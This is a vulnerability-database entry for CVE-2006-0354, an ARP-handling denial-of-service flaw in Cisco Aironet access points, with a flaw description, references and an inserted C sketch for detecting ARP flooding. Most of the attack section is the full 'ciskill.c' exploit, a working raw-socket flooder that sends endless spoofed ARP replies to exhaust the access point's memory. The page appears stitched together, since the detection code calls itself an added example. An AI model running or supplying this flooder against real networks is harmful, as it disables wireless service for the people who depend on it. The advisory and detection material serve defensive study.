Cisco Aironet Wireless Access Point ARP Attack Denial-of-Service Vulnerability

Vulnerability ID: 1109677 | Vulnerability type: Resource management error
Published: 2006-01-25 | Updated: 2009-03-04
CVE ID: CVE-2006-0354 | CNNVD-ID: CNNVD-200601-286
Platform: Hardware | CVSS score: 5.5
|Vulnerability source
https://www.exploit-db.com/exploits/1447
https://cxsecurity.com/issue/WLB-2006010027
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200601-286
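|Vulnerability details
Cisco Aironet wireless access points (APs) are very popular wireless network access devices. Cisco Aironet has a flaw in its handling of ARP requests that a remote attacker may be able to use to cause a denial of service on the device. An attacker who can successfully associate with a Cisco IOS wireless access point can spoof ARP messages to the access point's management interface. The attacker can add entries to the device's ARP table until physical memory is completely exhausted. The device is then unable to pass traffic until it is power-cycled and reloaded, which affects the availability of the wireless access point; management and packet-forwarding services may become unusable.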
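The ARP-table growth described above shows up on the wire as one station announcing many different IP addresses. The following detection sketch is an added example, not code from the original page or from Cisco: it flags a source MAC whose ARP packets claim more than a threshold number of distinct sender IPs. The names `parse_arp` and `arp_observe`, the table sizes and the threshold are assumptions chosen for illustration, and the tracking tables are deliberately bounded so the monitor cannot be exhausted the same way.

```c
#include <stdint.h>
#include <string.h>
#include <stddef.h>

#define MAX_MACS   64   /* tracked source MACs (assumed table size) */
#define MAX_IPS    32   /* distinct IPs remembered per MAC */
#define THRESHOLD  8    /* assumed limit on IPs one MAC may claim */

struct mac_entry { uint8_t mac[6]; uint32_t ips[MAX_IPS]; int nips; };
static struct mac_entry table[MAX_MACS];
static int nmacs;

/* Returns 1 if the frame is Ethernet/IPv4 ARP, filling sender MAC and IP. */
static int parse_arp(const uint8_t *f, size_t len, uint8_t mac[6], uint32_t *ip) {
    static const uint8_t hdr[] = {0x08,0x06, 0x00,0x01, 0x08,0x00, 0x06, 0x04};
    if (len < 42 || memcmp(f + 12, hdr, sizeof hdr) != 0) return 0;
    memcpy(mac, f + 22, 6);          /* ARP sender hardware address */
    memcpy(ip, f + 28, 4);           /* ARP sender protocol address */
    return 1;
}

/* Feed one captured frame; returns 1 once its sender MAC has claimed
   more than THRESHOLD distinct IPs (the table-filling pattern). */
int arp_observe(const uint8_t *frame, size_t len) {
    uint8_t mac[6]; uint32_t ip; int i, j;
    if (!parse_arp(frame, len, mac, &ip)) return 0;
    for (i = 0; i < nmacs; i++)
        if (memcmp(table[i].mac, mac, 6) == 0) break;
    if (i == nmacs) {
        if (nmacs == MAX_MACS) return 0;   /* tracker full: stay bounded */
        memcpy(table[nmacs].mac, mac, 6);
        table[nmacs++].nips = 0;
    }
    for (j = 0; j < table[i].nips; j++)
        if (table[i].ips[j] == ip) break;
    if (j == table[i].nips && j < MAX_IPS)
        table[i].ips[table[i].nips++] = ip;
    return table[i].nips > THRESHOLD;
}

/* Constructed sample: one MAC announcing 10.0.0.0 .. 10.0.0.9 in ARP replies. */
int main(void) {
    uint8_t f[42] = {0}; int k, hit = -1;
    static const uint8_t h[] = {0x08,0x06,0x00,0x01,0x08,0x00,0x06,0x04,0x00,0x02};
    memcpy(f + 12, h, sizeof h); memset(f + 22, 0x02, 6); f[28] = 10;
    for (k = 0; k < 10; k++) { f[31] = (uint8_t)k; if (arp_observe(f, sizeof f) && hit < 0) hit = k; }
    return hit == 8 ? 0 : 1;         /* flagged on the ninth distinct IP */
}
```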
|Exploit
//
// Cisco Killer - ciskill.c
//
// Usage: ./ciskill [device]
//
// Author: Pasv (pasvninja [at] gmail.com)
//
// Credit: This exploit takes advantage of a vulnerability that was
// discovered by Eric Smith on January 12, 2006 (bid:16217)
//
// Greets to NW, zimmy, GSO, and the rest.
//
// Description: The vulnerability exists in the way the affected versions
// below handle ARP replies, if enough specially crafted ARP packets are sent
// on the network with the affected systems it will cause the access point memory
// exhaustion which will in a few seconds (depending on the speed of the attacker
// and the memory of the target) crash the system, making all ingoing/outgoing
// traffic stopped.
//
// Disclaimer: I pity the foo who uses this exploit for evil, I take no responsibility
// for your actions (like a knife maker).
//
// Versions affected:
//  Cisco Aironet 350 IOS
//  Cisco Aironet 1400
//  Cisco Aironet 1300
//  Cisco Aironet 1240AG
//  Cisco Aironet 1230AG
//  Cisco Aironet 1200
//  Cisco Aironet 1130AG
//  Cisco Aironet 1100
// (this includes most linksys wireless access points)



#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <net/if.h>
#include <netinet/in.h>
#include <linux/if_ether.h>
#include <linux/sockios.h>

// Edit this packet accordingly if the target is picky
char pkt[]=
// Ethernet header
"\xff\xff\xff\xff\xff\xff" 	// Destination: broadcast
"AAAAAA"			// Source: 41:41:41:41:41:41
"\x08\x06"			// Pkt type: ARP
// ARP header
"\x00\x01"			// Hardware type: Ethernet
"\x08\x00"			// Protocol: IP
"\x06"				// Hardware size: 6
"\x04"				// Protocol size: 4
"\x00\x02"			// Opcode: Reply
"AAAAAA"			// Sender (Mac): 41:41:41:41:41:41
"AAAA"				// Sender (IP): 65.65.65.65
"AAAAAA"			// Target (mac): 41:41:41:41:41:41
"AAAA"				// Target (IP): 65.65.65.65
; // End of Packet

int main(int argc, char **argv) {
	FILE *fp;
	int sock, seed;
	long count = 0;
	char *device;
	in_addr_t addr;
	struct sockaddr sin;
	
	printf("CisKill -- Aironet Cisco Killer\nCoded by: Pasv\nDiscovery credit: Eric Smith\n");
	if(getuid()) {
		printf("Must be root to inject arp packets!\n");
		exit(1);
	}
	
	if(argc != 2) {
		device = "wlan0";	// default interface; the pointer had no buffer to copy into
	}
	else {
		device=argv[1];
	}

	fp = fopen("/dev/urandom", "r");
	fread(&seed, sizeof(seed), 1, fp);	// /dev/urandom yields raw bytes, not text
	fclose(fp);
	srand(seed);
	
	memset(&sin, 0, sizeof(sin));
	sin.sa_family = AF_UNSPEC;
	strncpy(sin.sa_data,device, 14);
	
	sock = socket(PF_INET, SOCK_PACKET, 0x300);
	
	printf("Using device: %s\n\n", device);	
	
	// stupid
	printf("Press ctrl+c immediately if you wish to stop\nGoing in 5\n");
	sleep(1);printf(" 4\n");sleep(1);printf(" 3\n");sleep(1);printf(" 2\n");sleep(1);printf(" 1!\n");sleep(1);
	
	while(1) {
		addr = (rand()%0xff)+(rand()%0xff)+(rand()%0xff)+(rand()%0xff);
		pkt[28] = (char)addr;
		pkt[38] = (char)addr;
		count++;
		printf("#:%ld bytes sent: %d (should be 42)\n",count,  sendto(sock, pkt, 42, 0, (struct sockaddr *)&sin, sizeof(sin)));
	}
}

// milw0rm.com [2006-01-25]
|References

Source: VUPEN
Name: ADV-2006-0176
Link: http://www.frsirt.com/english/advisories/2006/0176
Source: SECTRACK
Name: 1015483
Link: http://securitytracker.com/id?1015483
Source: SECUNIA
Name: 18430
Link: http://secunia.com/advisories/18430
Source: XF
Name: cisco-aironet-arp-dos(24086)
Link: http://xforce.iss.net/xforce/xfdb/24086
Source: BID
Name: 16217
Link: http://www.securityfocus.com/bid/16217
Source: OSVDB
Name: 22375
Link: http://www.osvdb.org/22375
Source: CISCO
Name: 20060112AccessPointMemoryExhaustionfromARPAttacks
Link: http://www.cisco.com/warp/public/707/cisco-sa-20060112-wireless.shtml
Source: SREASON
Name: 339
Link: http://securityreason.com/securityalert/339
Source: OVAL
Name: oval:org.mitre.oval:def:5680
Link: http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:5680